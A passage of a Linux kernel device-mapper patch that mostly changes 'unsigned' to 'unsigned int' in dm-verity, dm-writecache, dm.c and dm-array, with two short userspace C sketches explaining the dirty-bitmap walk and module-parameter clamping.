+ 	u8 *salt;		/* salt: its size is salt_size */
+ 	u8 *zero_digest;	/* digest for a zero block */
+-	unsigned salt_size;
++	unsigned int salt_size;
+ 	sector_t data_start;	/* data offset in 512-byte sectors */
+ 	sector_t hash_start;	/* hash start in blocks */
+ 	sector_t data_blocks;	/* the number of data blocks */
+@@ -54,10 +54,10 @@ struct dm_verity {
+ 	unsigned char version;
+ 	bool hash_failed:1;	/* set if hash of any block failed */
+ 	bool use_tasklet:1;	/* try to verify in tasklet before work-queue */
+-	unsigned digest_size;	/* digest size for the current hash algorithm */
++	unsigned int digest_size;	/* digest size for the current hash algorithm */
+ 	unsigned int ahash_reqsize;/* the size of temporary space for crypto */
+ 	enum verity_mode mode;	/* mode for handling verification errors */
+-	unsigned corrupted_errs;/* Number of errors for corrupted blocks */
++	unsigned int corrupted_errs;/* Number of errors for corrupted blocks */
+ 
+ 	struct workqueue_struct *verify_wq;
+ 
+@@ -77,7 +77,7 @@ struct dm_verity_io {
+ 	bio_end_io_t *orig_bi_end_io;
+ 
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ 	bool in_tasklet;
+ 
+ 	struct bvec_iter iter;
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index 96a003eb73234..431c84595ddb7 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -128,9 +128,9 @@ struct dm_writecache {
+ 	unsigned long max_age;
+ 	unsigned long pause;
+ 
+-	unsigned uncommitted_blocks;
+-	unsigned autocommit_blocks;
+-	unsigned max_writeback_jobs;
++	unsigned int uncommitted_blocks;
++	unsigned int autocommit_blocks;
++	unsigned int max_writeback_jobs;
+ 
+ 	int error;
+ 
+@@ -155,7 +155,7 @@ struct dm_writecache {
+ 	sector_t data_device_sectors;
+ 	void *block_start;
+ 	struct wc_entry *entries;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	unsigned char block_size_bits;
+ 
+ 	bool pmem_mode:1;
+@@ -178,13 +178,13 @@ struct dm_writecache {
+ 	bool metadata_only:1;
+ 	bool pause_set:1;
+ 
+-	unsigned high_wm_percent_value;
+-	unsigned low_wm_percent_value;
+-	unsigned autocommit_time_value;
+-	unsigned max_age_value;
+-	unsigned pause_value;
++	unsigned int high_wm_percent_value;
++	unsigned int low_wm_percent_value;
++	unsigned int autocommit_time_value;
++	unsigned int max_age_value;
++	unsigned int pause_value;
+ 
+-	unsigned writeback_all;
++	unsigned int writeback_all;
+ 	struct workqueue_struct *writeback_wq;
+ 	struct work_struct writeback_work;
+ 	struct work_struct flush_work;
+@@ -202,7 +202,7 @@ struct dm_writecache {
+ 
+ 	struct dm_kcopyd_client *dm_kcopyd;
+ 	unsigned long *dirty_bitmap;
+-	unsigned dirty_bitmap_size;
++	unsigned int dirty_bitmap_size;
+ 
+ 	struct bio_set bio_set;
+ 	mempool_t copy_pool;
+@@ -227,7 +227,7 @@ struct writeback_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry **wc_list;
+-	unsigned wc_list_n;
++	unsigned int wc_list_n;
+ 	struct wc_entry *wc_list_inline[WB_LIST_INLINE];
+ 	struct bio bio;
+ };
+@@ -236,7 +236,7 @@ struct copy_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry *e;
+-	unsigned n_entries;
++	unsigned int n_entries;
+ 	int error;
+ };
+ 
+@@ -369,7 +369,7 @@ static struct page *persistent_memory_page(void *addr)
+ 		return virt_to_page(addr);
+ }
+ 
+-static unsigned persistent_memory_page_offset(void *addr)
++static unsigned int persistent_memory_page_offset(void *addr)
+ {
+ 	return (unsigned long)addr & (PAGE_SIZE - 1);
+ }
+@@ -502,11 +502,11 @@ static void ssd_commit_flushed(struct dm_writecache *wc, bool wait_for_ios)
+ 		COMPLETION_INITIALIZER_ONSTACK(endio.c),
+ 		ATOMIC_INIT(1),
+ 	};
+-	unsigned bitmap_bits = wc->dirty_bitmap_size * 8;
+-	unsigned i = 0;
++	unsigned int bitmap_bits = wc->dirty_bitmap_size * 8;
++	unsigned int i = 0;
+ 
+ 	while (1) {
+-		unsigned j;
++		unsigned int j;
+ 		i = find_next_bit(wc->dirty_bitmap, bitmap_bits, i);
+ 		if (unlikely(i == bitmap_bits))
+ 			break;
+@@ -1100,7 +1100,7 @@ erase_this:
+ 	wc_unlock(wc);
+ }
+ 
+-static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1133,7 +1133,7 @@ static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *
+ 	return 0;
+ }
+ 
+-static int process_flush_on_suspend_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_on_suspend_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1153,7 +1153,7 @@ static void activate_cleaner(struct dm_writecache *wc)
+ 	wc->freelist_low_watermark = wc->n_blocks;
+ }
+ 
+-static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_cleaner_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1167,7 +1167,7 @@ static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache
+ 	return 0;
+ }
+ 
+-static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_clear_stats_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1179,8 +1179,8 @@ static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writec
+ 	return 0;
+ }
+ 
+-static int writecache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int writecache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_writecache *wc = ti->private;
+@@ -1238,9 +1238,9 @@ static void memcpy_flushcache_optimized(void *dest, void *source, size_t size)
+ static void bio_copy_block(struct dm_writecache *wc, struct bio *bio, void *data)
+ {
+ 	void *buf;
+-	unsigned size;
++	unsigned int size;
+ 	int rw = bio_data_dir(bio);
+-	unsigned remaining_size = wc->block_size;
++	unsigned int remaining_size = wc->block_size;
+ 
+ 	do {
+ 		struct bio_vec bv = bio_iter_iovec(bio, bio->bi_iter);
+@@ -1371,7 +1371,7 @@ read_next_block:
+ static void writecache_bio_copy_ssd(struct dm_writecache *wc, struct bio *bio,
+ 				    struct wc_entry *e, bool search_used)
+ {
+-	unsigned bio_size = wc->block_size;
++	unsigned int bio_size = wc->block_size;
+ 	sector_t start_cache_sec = cache_sector(wc, e);
+ 	sector_t current_cache_sec = start_cache_sec + (bio_size >> SECTOR_SHIFT);
+ 
+@@ -1540,7 +1540,7 @@ static int writecache_map(struct dm_target *ti, struct bio *bio)
+ 
+ 	bio->bi_iter.bi_sector = dm_target_offset(ti, bio->bi_iter.bi_sector);
+ 
+-	if (unlikely((((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (unlikely((((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 				(wc->block_size / 512 - 1)) != 0)) {
+ 		DMERR("I/O is not aligned, sector %llu, size %u, block size %u",
+ 		      (unsigned long long)bio->bi_iter.bi_sector,
+@@ -1666,7 +1666,7 @@ static void writecache_copy_endio(int read_err, unsigned long write_err, void *p
+ 
+ static void __writecache_endio_pmem(struct dm_writecache *wc, struct list_head *list)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct writeback_struct *wb;
+ 	struct wc_entry *e;
+ 	unsigned long n_walked = 0;
+@@ -1782,7 +1782,7 @@ pop_from_list:
+ static bool wc_add_block(struct writeback_struct *wb, struct wc_entry *e)
+ {
+ 	struct dm_writecache *wc = wb->wc;
+-	unsigned block_size = wc->block_size;
++	unsigned int block_size = wc->block_size;
+ 	void *address = memory_data(wc, e);
+ 
+ 	persistent_memory_flush_cache(address, block_size);
+@@ -1817,7 +1817,7 @@ static void __writecache_writeback_pmem(struct dm_writecache *wc, struct writeba
+ 	struct wc_entry *e, *f;
+ 	struct bio *bio;
+ 	struct writeback_struct *wb;
+-	unsigned max_pages;
++	unsigned int max_pages;
+ 
+ 	while (wbl->size) {
+ 		wbl->size--;
+@@ -1880,7 +1880,7 @@ static void __writecache_writeback_ssd(struct dm_writecache *wc, struct writebac
+ 	struct copy_struct *c;
+ 
+ 	while (wbl->size) {
+-		unsigned n_sectors;
++		unsigned int n_sectors;
+ 
+ 		wbl->size--;
+ 		e = container_of(wbl->list.prev, struct wc_entry, lru);
+@@ -2092,7 +2092,7 @@ restart:
+ 	}
+ }
+ 
+-static int calculate_memory_size(uint64_t device_size, unsigned block_size,
++static int calculate_memory_size(uint64_t device_size, unsigned int block_size,
+ 				 size_t *n_blocks_p, size_t *n_metadata_blocks_p)
+ {
+ 	uint64_t n_blocks, offset;
+@@ -2207,12 +2207,12 @@ static void writecache_dtr(struct dm_target *ti)
+ 	kfree(wc);
+ }
+ 
+-static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int writecache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_writecache *wc;
+ 	struct dm_arg_set as;
+ 	const char *string;
+-	unsigned opt_params;
++	unsigned int opt_params;
+ 	size_t offset, data_size;
+ 	int i, r;
+ 	char dummy;
+@@ -2419,7 +2419,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 				goto invalid_optional;
+ 			wc->autocommit_blocks_set = true;
+ 		} else if (!strcasecmp(string, "autocommit_time") && opt_params >= 1) {
+-			unsigned autocommit_msecs;
++			unsigned int autocommit_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &autocommit_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2429,7 +2429,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 			wc->autocommit_time_value = autocommit_msecs;
+ 			wc->autocommit_time_set = true;
+ 		} else if (!strcasecmp(string, "max_age") && opt_params >= 1) {
+-			unsigned max_age_msecs;
++			unsigned int max_age_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &max_age_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2454,7 +2454,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		} else if (!strcasecmp(string, "metadata_only")) {
+ 			wc->metadata_only = true;
+ 		} else if (!strcasecmp(string, "pause_writeback") && opt_params >= 1) {
+-			unsigned pause_msecs;
++			unsigned int pause_msecs;
+ 			if (WC_MODE_PMEM(wc))
+ 				goto invalid_optional;
+ 			string = dm_shift_arg(&as), opt_params--;
+@@ -2653,11 +2653,11 @@ bad:
+ }
+ 
+ static void writecache_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result, unsigned maxlen)
++			      unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_writecache *wc = ti->private;
+-	unsigned extra_args;
+-	unsigned sz = 0;
++	unsigned int extra_args;
++	unsigned int sz = 0;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
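
The ssd_commit_flushed() hunk above walks the dirty bitmap with find_next_bit()/find_next_zero_bit() to turn scattered dirty metadata bits into contiguous write ranges. A userspace sketch of the same walk, with a naive bit scan standing in for the kernel helpers:

#include <stdio.h>

#define BITS 32

/* Return the index of the next bit >= 'from' whose value equals 'set',
 * or 'n' if there is none. */
static unsigned int next_bit(const unsigned char *bm, unsigned int n,
			     unsigned int from, int set)
{
	while (from < n && (((bm[from / 8] >> (from % 8)) & 1) != set))
		from++;
	return from;
}

int main(void)
{
	unsigned char dirty[BITS / 8] = { 0 };
	unsigned int i = 0, j;

	dirty[0] = 0x0c;	/* bits 2-3 dirty */
	dirty[2] = 0x01;	/* bit 16 dirty */

	while ((i = next_bit(dirty, BITS, i, 1)) < BITS) {
		j = next_bit(dirty, BITS, i, 0);
		printf("write range [%u, %u)\n", i, j);	/* [2,4) then [16,17) */
		i = j;
	}
	return 0;
}
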
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 1b6c3c783a8eb..cdbf24def8af3 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -83,7 +83,7 @@ struct clone_info {
+ 	struct bio *bio;
+ 	struct dm_io *io;
+ 	sector_t sector;
+-	unsigned sector_count;
++	unsigned int sector_count;
+ 	bool is_abnormal_io:1;
+ 	bool submit_as_polled:1;
+ };
+@@ -111,7 +111,7 @@ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size)
+ }
+ EXPORT_SYMBOL_GPL(dm_bio_from_per_bio_data);
+ 
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio)
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio)
+ {
+ 	return container_of(bio, struct dm_target_io, clone)->target_bio_nr;
+ }
+@@ -142,7 +142,7 @@ struct table_device {
+  * Bio-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_BIO_BASED_IOS		16
+-static unsigned reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
++static unsigned int reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
+ 
+ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ {
+@@ -165,11 +165,10 @@ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ 	return param;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param,
+-			       unsigned def, unsigned max)
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max)
+ {
+-	unsigned param = READ_ONCE(*module_param);
+-	unsigned modified_param = 0;
++	unsigned int param = READ_ONCE(*module_param);
++	unsigned int modified_param = 0;
+ 
+ 	if (!param)
+ 		modified_param = def;
+@@ -184,14 +183,14 @@ unsigned __dm_get_module_param(unsigned *module_param,
+ 	return param;
+ }
+ 
+-unsigned dm_get_reserved_bio_based_ios(void)
++unsigned int dm_get_reserved_bio_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_bio_based_ios,
+ 				     RESERVED_BIO_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ EXPORT_SYMBOL_GPL(dm_get_reserved_bio_based_ios);
+ 
+-static unsigned dm_get_numa_node(void)
++static unsigned int dm_get_numa_node(void)
+ {
+ 	return __dm_get_module_param_int(&dm_numa_node,
+ 					 DM_NUMA_NODE, num_online_nodes() - 1);
+@@ -603,7 +602,7 @@ static void free_io(struct dm_io *io)
+ }
+ 
+ static struct bio *alloc_tio(struct clone_info *ci, struct dm_target *ti,
+-			     unsigned target_bio_nr, unsigned *len, gfp_t gfp_mask)
++			     unsigned int target_bio_nr, unsigned int *len, gfp_t gfp_mask)
+ {
+ 	struct mapped_device *md = ci->io->md;
+ 	struct dm_target_io *tio;
+@@ -1314,11 +1313,11 @@ out:
+  * the partially processed part (the sum of regions 1+2) must be the same for all
+  * copies of the bio.
+  */
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors)
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors)
+ {
+ 	struct dm_target_io *tio = clone_to_tio(bio);
+ 	struct dm_io *io = tio->io;
+-	unsigned bio_sectors = bio_sectors(bio);
++	unsigned int bio_sectors = bio_sectors(bio);
+ 
+ 	BUG_ON(dm_tio_flagged(tio, DM_TIO_IS_DUPLICATE_BIO));
+ 	BUG_ON(op_is_zone_mgmt(bio_op(bio)));
+@@ -1447,7 +1446,7 @@ static void __map_bio(struct bio *clone)
+ 	}
+ }
+ 
+-static void setup_split_accounting(struct clone_info *ci, unsigned len)
++static void setup_split_accounting(struct clone_info *ci, unsigned int len)
+ {
+ 	struct dm_io *io = ci->io;
+ 
+@@ -1463,7 +1462,8 @@ static void setup_split_accounting(struct clone_info *ci, unsigned len)
+ }
+ 
+ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+-				struct dm_target *ti, unsigned num_bios)
++				struct dm_target *ti, unsigned int num_bios,
++				unsigned *len)
+ {
+ 	struct bio *bio;
+ 	int try;
+@@ -1474,7 +1474,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ 		if (try)
+ 			mutex_lock(&ci->io->md->table_devices_lock);
+ 		for (bio_nr = 0; bio_nr < num_bios; bio_nr++) {
+-			bio = alloc_tio(ci, ti, bio_nr, NULL,
++			bio = alloc_tio(ci, ti, bio_nr, len,
+ 					try ? GFP_NOIO : GFP_NOWAIT);
+ 			if (!bio)
+ 				break;
+@@ -1492,7 +1492,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ }
+ 
+ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+-				 unsigned int num_bios, unsigned *len)
++				 unsigned int num_bios, unsigned int *len)
+ {
+ 	struct bio_list blist = BIO_EMPTY_LIST;
+ 	struct bio *clone;
+@@ -1512,7 +1512,7 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		if (len)
+ 			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+-		alloc_multiple_bios(&blist, ci, ti, num_bios);
++		alloc_multiple_bios(&blist, ci, ti, num_bios, len);
+ 		while ((clone = bio_list_pop(&blist))) {
+ 			dm_tio_set_flag(clone_to_tio(clone), DM_TIO_IS_DUPLICATE_BIO);
+ 			__map_bio(clone);
+@@ -1560,10 +1560,9 @@ static void __send_empty_flush(struct clone_info *ci)
+ }
+ 
+ static void __send_changing_extent_only(struct clone_info *ci, struct dm_target *ti,
+-					unsigned num_bios)
++					unsigned int num_bios)
+ {
+-	unsigned len;
+-	unsigned int bios;
++	unsigned int len, bios;
+ 
+ 	len = min_t(sector_t, ci->sector_count,
+ 		    max_io_len_target_boundary(ti, dm_target_offset(ti, ci->sector)));
+@@ -1601,7 +1600,7 @@ static bool is_abnormal_io(struct bio *bio)
+ static blk_status_t __process_abnormal_io(struct clone_info *ci,
+ 					  struct dm_target *ti)
+ {
+-	unsigned num_bios = 0;
++	unsigned int num_bios = 0;
+ 
+ 	switch (bio_op(ci->bio)) {
+ 	case REQ_OP_DISCARD:
+@@ -1679,7 +1678,7 @@ static blk_status_t __split_and_process_bio(struct clone_info *ci)
+ {
+ 	struct bio *clone;
+ 	struct dm_target *ti;
+-	unsigned len;
++	unsigned int len;
+ 
+ 	ti = dm_table_find_target(ci->map, ci->sector);
+ 	if (unlikely(!ti))
+@@ -2376,7 +2375,7 @@ out_undo_holders:
+ struct mapped_device *dm_get_md(dev_t dev)
+ {
+ 	struct mapped_device *md;
+-	unsigned minor = MINOR(dev);
++	unsigned int minor = MINOR(dev);
+ 
+ 	if (MAJOR(dev) != _major || minor >= (1 << MINORBITS))
+ 		return NULL;
+@@ -2659,7 +2658,7 @@ static void unlock_fs(struct mapped_device *md)
+  * are being added to md->deferred list.
+  */
+ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+-			unsigned suspend_flags, unsigned int task_state,
++			unsigned int suspend_flags, unsigned int task_state,
+ 			int dmf_suspended_flag)
+ {
+ 	bool do_lockfs = suspend_flags & DM_SUSPEND_LOCKFS_FLAG;
+@@ -2766,7 +2765,7 @@ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+  *
+  * To abort suspend, start the request_queue.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags)
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 	int r = 0;
+@@ -2868,7 +2867,7 @@ out:
+  * It may be used only from the kernel.
+  */
+ 
+-static void __dm_internal_suspend(struct mapped_device *md, unsigned suspend_flags)
++static void __dm_internal_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 
+@@ -2970,10 +2969,10 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent)
++		      unsigned int cookie, bool need_resize_uevent)
+ {
+ 	int r;
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+ 	char *envp[3] = { NULL, NULL, NULL };
+ 	char **envpp = envp;
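
The __dm_get_module_param() hunk above reads a writable module parameter once and clamps it into range (default if zero, capped at max), writing the corrected value back only when it changed, so a concurrent sysfs write cannot feed the fast path an out-of-range value. A sketch of the clamp logic; the kernel uses READ_ONCE() and cmpxchg(), for which a plain variable and assignment stand in here:

#include <stdio.h>

static unsigned int get_param(unsigned int *param, unsigned int def, unsigned int max)
{
	unsigned int val = *param;	/* kernel: READ_ONCE(*module_param) */
	unsigned int fixed = 0;

	if (!val)
		fixed = def;
	else if (val > max)
		fixed = max;

	if (fixed) {
		*param = fixed;		/* kernel: cmpxchg(module_param, val, fixed) */
		val = fixed;
	}
	return val;
}

int main(void)
{
	unsigned int reserved_ios = 0;

	printf("%u\n", get_param(&reserved_ios, 16, 1024));	/* 16: zero -> default */
	reserved_ios = 4096;
	printf("%u\n", get_param(&reserved_ios, 16, 1024));	/* 1024: clamped to max */
	return 0;
}
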
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index a9a3ffcad084c..a7917df09cafb 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent);
++		      unsigned int cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+@@ -222,6 +222,6 @@ void dm_free_md_mempools(struct dm_md_mempools *pools);
+ /*
+  * Various helpers
+  */
+-unsigned dm_get_reserved_bio_based_ios(void);
++unsigned int dm_get_reserved_bio_based_ios(void);
+ 
+ #endif
+diff --git a/drivers/md/persistent-data/dm-array.c b/drivers/md/persistent-data/dm-array.c
+index 3a963d783a865..eff9b41869f29 100644
+--- a/drivers/md/persistent-data/dm-array.c
++++ b/drivers/md/persistent-data/dm-array.c
+@@ -68,8 +68,8 @@ static int array_block_check(struct dm_block_validator *v,
+ 					       CSUM_XOR));
+ 	if (csum_disk != bh_le->csum) {
+ 		DMERR_LIMIT("array_block_check failed: csum %u != wanted %u",
+-			    (unsigned) le32_to_cpu(csum_disk),
+-			    (unsigned) le32_to_cpu(bh_le->csum));
++			    (unsigned int) le32_to_cpu(csum_disk),
++			    (unsigned int) le32_to_cpu(bh_le->csum));
+ 		return -EILSEQ;
+ 	}
+ 
+@@ -94,7 +94,7 @@ static struct dm_block_validator array_validator = {
+  * index - The index into _this_ specific block.
+  */
+ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+-			unsigned index)
++			unsigned int index)
+ {
+ 	unsigned char *entry = (unsigned char *) (ab + 1);
+ 
+@@ -108,9 +108,9 @@ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+  * in an array block.
+  */
+ static void on_entries(struct dm_array_info *info, struct array_block *ab,
+-		       void (*fn)(void *, const void *, unsigned))
++		       void (*fn)(void *, const void *, unsigned int))
+ {
+-	unsigned nr_entries = le32_to_cpu(ab->nr_entries);
++	unsigned int nr_entries = le32_to_cpu(ab->nr_entries);
+ 	fn(info->value_type.context, element_at(info, ab, 0), nr_entries);
+ }
+ 
+@@ -171,7 +171,7 @@ static int alloc_ablock(struct dm_array_info *info, size_t size_of_block,
+  * the current number of entries.
+  */
+ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+-			const void *value, unsigned new_nr)
++			const void *value, unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta, i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -194,7 +194,7 @@ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+  * entries.
+  */
+ static void trim_ablock(struct dm_array_info *info, struct array_block *ab,
+-			unsigned new_nr)
++			unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -247,7 +247,7 @@ static void unlock_ablock(struct dm_array_info *info, struct dm_block *block)
+  * / max_entries).
+  */
+ static int lookup_ablock(struct dm_array_info *info, dm_block_t root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -295,7 +295,7 @@ static int __shadow_ablock(struct dm_array_info *info, dm_block_t b,
+  * The shadow op will often be a noop.  Only insert if it really
+  * copied data.
+  */
+-static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
++static int __reinsert_ablock(struct dm_array_info *info, unsigned int index,
+ 			     struct dm_block *block, dm_block_t b,
+ 			     dm_block_t *root)
+ {
+@@ -321,7 +321,7 @@ static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
+  * for both the current root block, and the new one.
+  */
+ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -346,7 +346,7 @@ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+  */
+ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ 			     uint32_t max_entries,
+-			     unsigned block_index, uint32_t nr,
++			     unsigned int block_index, uint32_t nr,
+ 			     const void *value, dm_block_t *root)
+ {
+ 	int r;
+@@ -365,8 +365,8 @@ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ }
+ 
+ static int insert_full_ablocks(struct dm_array_info *info, size_t size_of_block,
+-			       unsigned begin_block, unsigned end_block,
+-			       unsigned max_entries, const void *value,
++			       unsigned int begin_block, unsigned int end_block,
++			       unsigned int max_entries, const void *value,
+ 			       dm_block_t *root)
+ {
+ 	int r = 0;
+@@ -402,20 +402,20 @@ struct resize {
+ 	/*
+ 	 * Maximum nr entries in an array block.
+ 	 */
+-	unsigned max_entries;
++	unsigned int max_entries;
+ 
+ 	/*
+ 	 * nr of completely full blocks in the array.
+ 	 *
+ 	 * 'old' refers to before the resize, 'new' after.
+ 	 */
+-	unsigned old_nr_full_blocks, new_nr_full_blocks;
++	unsigned int old_nr_full_blocks, new_nr_full_blocks;
+ 
+ 	/*
+ 	 * Number of entries in the final block.  0 iff only full blocks in
+ 	 * the array.
+ 	 */
+-	unsigned old_nr_entries_in_last_block, new_nr_entries_in_last_block;
++	unsigned int old_nr_entries_in_last_block, new_nr_entries_in_last_block;
+ 
+ 	/*
+ 	 * The default value used when growing the array.
+@@ -430,8 +430,8 @@ struct resize {
+  * begin_index - the index of the first array block to remove.
+  * end_index - the one-past-the-end value.  ie. this block is not removed.
+  */
+-static int drop_blocks(struct resize *resize, unsigned begin_index,
+-		       unsigned end_index)
++static int drop_blocks(struct resize *resize, unsigned int begin_index,
++		       unsigned int end_index)
+ {
+ 	int r;
+ 
+@@ -449,8 +449,8 @@ static int drop_blocks(struct resize *resize, unsigned begin_index,
+ /*
+  * Calculates how many blocks are needed for the array.
+  */
+-static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+-				       unsigned nr_entries_in_last_block)
++static unsigned int total_nr_blocks_needed(unsigned int nr_full_blocks,
++				       unsigned int nr_entries_in_last_block)
+ {
+ 	return nr_full_blocks + (nr_entries_in_last_block ? 1 : 0);
+ }
+@@ -461,7 +461,7 @@ static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+ static int shrink(struct resize *resize)
+ {
+ 	int r;
+-	unsigned begin, end;
++	unsigned int begin, end;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
+@@ -527,7 +527,7 @@ static int grow_add_tail_block(struct resize *resize)
+ static int grow_needs_more_blocks(struct resize *resize)
+ {
+ 	int r;
+-	unsigned old_nr_blocks = resize->old_nr_full_blocks;
++	unsigned int old_nr_blocks = resize->old_nr_full_blocks;
+ 
+ 	if (resize->old_nr_entries_in_last_block > 0) {
+ 		old_nr_blocks++;
+@@ -569,11 +569,11 @@ static int grow(struct resize *resize)
+  * These are the value_type functions for the btree elements, which point
+  * to array blocks.
+  */
+-static void block_inc(void *context, const void *value, unsigned count)
++static void block_inc(void *context, const void *value, unsigned int count)
+ {
+ 	const __le64 *block_le = value;
+ 	struct dm_array_info *info = context;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, block_le++)
+ 		dm_tm_inc(info->btree_info.tm, le64_to_cpu(*block_le));
+@@ -618,9 +618,9 @@ static void __block_dec(void *context, const void *value)
+ 	dm_tm_dec(info->btree_info.tm, b);
+ }
+ 
+-static void block_dec(void *context, const void *value, unsigned count)
++static void block_dec(void *context, const void *value, unsigned int count)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < count; i++, value += sizeof(__le64))
+ 		__block_dec(context, value);
+ }
+@@ -700,10 +700,11 @@ int dm_array_resize(struct dm_array_info *info, dm_block_t root,
+ EXPORT_SYMBOL_GPL(dm_array_resize);
+ 
+ static int populate_ablock_with_values(struct dm_array_info *info, struct array_block *ab,
+-				       value_fn fn, void *context, unsigned base, unsigned new_nr)
++				       value_fn fn, void *context,
